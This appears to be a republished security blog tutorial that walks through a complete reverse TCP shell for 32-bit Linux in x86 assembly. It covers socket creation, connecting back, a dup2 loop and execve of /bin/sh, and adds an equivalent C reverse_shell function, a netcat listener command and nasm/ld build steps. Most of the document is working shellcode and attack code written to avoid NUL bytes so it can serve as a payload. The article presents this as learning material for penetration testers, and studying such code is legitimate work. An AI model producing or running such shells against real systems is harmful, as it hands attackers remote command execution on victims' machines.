Reverse TCP Shell in x86 Assembly: A Deep Dive

Creating a reverse TCP shell in x86 assembly is a challenging but rewarding exercise for anyone learning low-level programming or offensive security. The code below targets 32-bit Linux and talks to the kernel directly through the int 0x80 interface. We break down the four steps (create a socket, connect back, redirect the standard descriptors, execute a shell) and give a practical snippet for each so you can understand and implement the technique yourself.

You Should Know: Key Components of a Reverse TCP Shell in x86 Assembly

1. Socket Creation (Linux x86)

A TCP reverse shell starts with socket programming. On 32-bit Linux the whole socket API is multiplexed through a single syscall, sys_socketcall (number 102, 0x66): EBX selects the operation (SYS_SOCKET = 1, SYS_CONNECT = 3, ...) and ECX points to an array of the operation's arguments, which we build on the stack. Registers are zeroed with xor and loaded through their low bytes (mov al, mov bl) so the encoded instructions contain no NUL bytes, which matters when the code is later used as shellcode. Here is how to create the socket:

section .text 
global _start

_start: 
; Create socket: socket(AF_INET, SOCK_STREAM, 0) 
xor eax, eax ; zero EAX/EBX/ECX without NUL bytes in the encoding 
xor ebx, ebx 
xor ecx, ecx 
mov al, 0x66 ; sys_socketcall (102) 
mov bl, 0x1 ; SYS_SOCKET 
push ecx ; protocol = 0 (arguments are pushed last-first) 
push 0x1 ; SOCK_STREAM 
push 0x2 ; AF_INET 
mov ecx, esp ; ECX -> {AF_INET, SOCK_STREAM, 0} 
int 0x80 ; returns the new socket fd in EAX 
mov esi, eax ; save socket fd in ESI for the later steps 

2. Connecting to the Attacker (Reverse Shell)

After socket creation, connect to the attacker's IP and port. The struct sockaddr_in is built on the stack with three pushes; because the stack grows downwards, the fields are pushed in reverse order (address, then port, then family) so that they lie in memory as sin_family, sin_port, sin_addr. Note that this snippet never checks the return value of connect: if no listener is reachable, EAX holds a negative errno, the mov al instructions that follow only overwrite the low byte, and the dup2 calls silently fail, so the final /bin/sh is spawned attached to the original terminal instead of the socket.

; Connect: connect(sockfd, &addr, 16) 
mov al, 0x66 ; sys_socketcall (EAX still holds the small fd, so only AL needs setting) 
mov bl, 0x3 ; SYS_CONNECT 
push 0x0101017F ; sin_addr = 127.1.1.1 (bytes 7F 01 01 01 once pushed; 127.0.0.1 would put NUL bytes into the shellcode) 
push word 0x901F ; sin_port = 8080 (0x1F90 in network byte order) 
push word 0x2 ; sin_family = AF_INET 
mov ecx, esp ; ECX -> struct sockaddr_in 
push 0x10 ; addrlen = sizeof(struct sockaddr_in) = 16 
push ecx ; &addr 
push esi ; sockfd 
mov ecx, esp ; ECX -> {sockfd, &addr, 16} 
int 0x80 ; returns 0 on success, negative errno on failure 

3. Redirecting STDIN, STDOUT, STDERR to the Socket

To interact with the shell, duplicate the socket onto file descriptors 0, 1 and 2 with dup2(sockfd, n). A small loop counts ECX down from 3, so the calls happen for fd 2, 1 and then 0:

; dup2(sockfd, 2), dup2(sockfd, 1), dup2(sockfd, 0) 
xor ecx, ecx 
mov cl, 0x3 ; loop counter; decremented before each call, so fds 2, 1, 0 
mov ebx, esi ; oldfd = sockfd 
dup_loop: 
dec ecx ; newfd = ECX 
mov al, 0x3F ; sys_dup2 (63); EAX holds the previous small return value, so AL is enough 
int 0x80 
jnz dup_loop ; ZF still reflects dec ecx (the kernel preserves EFLAGS across int 0x80) 

4. Executing `/bin/sh`

Finally, spawn a shell:

; execve("/bin//sh", ["/bin//sh", NULL], NULL) 
xor eax, eax 
push eax ; NUL terminator for the path string 
push 0x68732F2F ; "//sh" (the double slash pads the path to 8 bytes without a NUL) 
push 0x6E69622F ; "/bin" 
mov ebx, esp ; EBX -> "/bin//sh" 
push eax ; argv[1] = NULL 
push ebx ; argv[0] = pointer to "/bin//sh" 
mov ecx, esp ; ECX -> argv 
mov edx, eax ; envp = NULL (EAX is still 0) 
mov al, 0xB ; sys_execve (11) 
int 0x80 
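The same four steps written in C, as an added example that is not part of the original post. It is useful in two ways: as the reference program you can trace with strace before translating it to assembly, and as a check that the raw bytes the three pushes leave on the stack really are a valid struct sockaddr_in. It assumes the post's target of 127.1.1.1:8080 and a Linux/glibc build; the function names (asm_layout_matches_libc, nul_bytes_in_ip_immediate, reverse_shell) are the example's own.

```c
/* Added example: reverse shell in C mirroring the assembly above,
 * plus checks on the hand-built sockaddr_in bytes. Not from the original post. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* The 8 bytes that
 *   push 0x0101017F ; push word 0x901F ; push word 0x2
 * leave at ESP, lowest address first (x86 is little-endian). */
static const uint8_t asm_sockaddr[8] = {
    0x02, 0x00,             /* sin_family = AF_INET (2)     */
    0x1F, 0x90,             /* sin_port   = htons(8080)     */
    0x7F, 0x01, 0x01, 0x01  /* sin_addr   = 127.1.1.1       */
};

/* Build the same structure with libc; return 1 if the layout agrees with
 * the assembly bytes and the length the assembly passes (push 0x10). */
int asm_layout_matches_libc(void) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(8080);
    if (inet_pton(AF_INET, "127.1.1.1", &sa.sin_addr) != 1) return 0;
    if (sizeof sa != 0x10) return 0;
    return memcmp(&sa, asm_sockaddr, sizeof asm_sockaddr) == 0;
}

/* Number of NUL bytes a `push imm32` of this address would embed in the
 * shellcode; -1 for an invalid dotted quad. 127.0.0.1 gives 2, 127.1.1.1 gives 0. */
int nul_bytes_in_ip_immediate(const char *ip) {
    struct in_addr a;
    uint8_t b[4];
    int n = 0;
    if (inet_pton(AF_INET, ip, &a) != 1) return -1;
    memcpy(b, &a, sizeof b);
    for (int i = 0; i < 4; i++)
        if (b[i] == 0) n++;
    return n;
}

/* socket -> connect -> dup2 x3 -> execve, in the order the assembly uses.
 * Unlike the assembly it stops if connect fails. Never returns on success. */
int reverse_shell(const char *ip, uint16_t port) {
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) { close(fd); return -1; }
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) { close(fd); return -1; }
    for (int i = 2; i >= 0; i--)          /* same order as the dec ecx loop: 2, 1, 0 */
        dup2(fd, i);
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);        /* envp = NULL, as in the assembly */
    return -1;
}

int main(void) {
    printf("asm sockaddr layout matches libc: %s\n",
           asm_layout_matches_libc() ? "yes" : "no");
    printf("NUL bytes in push imm32 for 127.0.0.1: %d\n", nul_bytes_in_ip_immediate("127.0.0.1"));
    printf("NUL bytes in push imm32 for 127.1.1.1: %d\n", nul_bytes_in_ip_immediate("127.1.1.1"));
    /* Start `nc -lvnp 8080` in another terminal, then uncomment to get the shell: */
    /* return reverse_shell("127.1.1.1", 8080); */
    return 0;
}
```

Run it under `strace` to see exactly the syscall sequence (socket, connect, dup2, dup2, dup2, execve) the assembly has to reproduce; on 32-bit builds strace will show the first two as socketcall, which is why the assembly loads 0x66 with a sub-operation in EBX.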

What Undercode Say

Writing a Reverse TCP Shell in x86 Assembly requires deep knowledge of system calls, network programming, and low-level execution flow. This technique is often used in exploit development and cybersecurity research.

Additional Useful Commands for Cybersecurity Practitioners

  • Linux Networking:
    nc -lvnp 8080  Listener for the reverse shell (start it before running the binary) 
    strace ./shell  Trace the syscalls the shell makes 
    objdump -d shell  Disassemble the linked ELF 
    objdump -D -b binary -m i386 shell.bin  Disassemble raw shellcode bytes (objdump needs the -b/-m hints for a non-ELF file) 
    
  • Windows Equivalent (a netcat build for Windows, run from PowerShell or cmd):
    nc.exe -lvp 8080 
    
  • Assembly Compilation (32-bit ELF):
    nasm -f elf32 shell.asm -o shell.o 
    ld -m elf_i386 shell.o -o shell 
    

Expected Output:

A functional reverse shell: when the binary runs on the target, it connects back to the attacker's listener on port 8080 and hands over an interactive /bin/sh, allowing remote command execution.

This article provides a hands-on approach to understanding and implementing Reverse TCP Shells in x86 Assembly, a crucial skill for penetration testers and malware analysts.

Reported By: Kavinarasue I – Hackers Feeds
